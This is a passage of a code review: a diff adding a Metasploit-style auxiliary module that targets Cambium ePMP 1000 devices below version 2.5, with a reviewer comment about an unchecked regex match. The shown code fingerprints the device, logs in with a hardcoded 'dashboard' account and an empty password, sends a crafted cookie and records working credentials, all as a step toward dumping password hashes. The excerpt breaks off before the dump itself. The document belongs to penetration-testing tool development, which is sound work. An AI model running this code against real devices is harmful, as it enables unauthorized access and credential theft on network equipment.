modules/auxiliary/scanner/http/epmp1000_dump_hashes.rb

```diff
@@ -0,0 +1,248 @@
+  #
+
+  def is_app_epmp1000?
+    begin
+      res = send_request_cgi(
+        {
+          'uri'       => '/',
+          'method'    => 'GET'
+        }
+      )
+
+    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
+      print_error("#{rhost}:#{rport} - HTTP Connection Failed...")
+      return false
+    end
+
+    if (res && res.code == 200 && res.headers['Server'] && (res.headers['Server'].include?('Cambium HTTP Server') || res.body.include?('cambiumnetworks.com')))
+
+      get_epmp_ver = res.body.match(/"sw_version">([^<]*)/)
+      epmp_ver = get_epmp_ver[1]
+      print_good("#{rhost}:#{rport} - Running Cambium ePMP 1000 version #{epmp_ver}...")
+
+      if ("#{epmp_ver}" >= '2.5')
+        print_error('This ePMP version is not vulnerable. Module will not continue.')
+        return false
+      else
+        return true
+      end
+    else
+      print_error("#{rhost}:#{rport} - Application does not appear to be Cambium ePMP 1000. Module will not continue.")
+      return false
+    end
+  end
+
+  #
+  # Dump ePMP Password Hashes
+  #
+
+  def do_login(user, pass)
+    print_status("#{rhost}:#{rport} - Attempting to login...")
+    begin
+      res = send_request_cgi(
+        {
+          'uri'       => '/cgi-bin/luci',
+          'method'    => 'POST',
+          'headers'   => { 'X-Requested-With' => 'XMLHttpRequest', 'Accept' => 'application/json, text/javascript, */*; q=0.01' },
+          'vars_post' =>
+            {
+              'username' => 'dashboard',
+              'password' => ''
+            }
+        }
+      )
+
+      if (res && res.code == 200 && res.headers.include?('Set-Cookie') && res.headers['Set-Cookie'].include?('sysauth'))
+        sysauth_value = res.headers['Set-Cookie'].match(/((.*)[$ ])/)
+
+        cookie1 = "#{sysauth_value}; " + "globalParams=%7B%22dashboard%22%3A%7B%22refresh_rate%22%3A%225%22%7D%2C%22#{user}%22%3A%7B%22refresh_rate%22%3A%225%22%7D%7D"
+
+        res = send_request_cgi(
+          {
+            'uri'       => '/cgi-bin/luci',
+            'method'    => 'POST',
+            'cookie'    => cookie1,
+            'headers'   => { 'X-Requested-With' => 'XMLHttpRequest', 'Accept' => 'application/json, text/javascript, */*; q=0.01', 'Connection' => 'close' },
+            'vars_post' =>
+              {
+                'username' => user,
+                'password' => pass
+              }
+          }
+        )
+
+      end
+
+      if (res && res.code == 200 && res.headers.include?('Set-Cookie') && res.headers['Set-Cookie'].include?('stok='))
+        print_good("SUCCESSFUL LOGIN - #{rhost}:#{rport} - #{user.inspect}:#{pass.inspect}")
+
+        report_cred(
+          ip: rhost,
+          port: rport,
+          service_name: 'Cambium ePMP 1000',
+          user: user,
+          password: pass
+        )
+
+        get_stok = res.headers['Set-Cookie'].match(/stok=(.*)/)
+        stok_value = get_stok[1]
```

Comment:
Hmm.. if `get_stok` tries that match and fails, it will return `nil`. Then when we call `get_stok[1]` we will throw an error.

We might need to `return false unless get_stok.present?` here. Thoughts?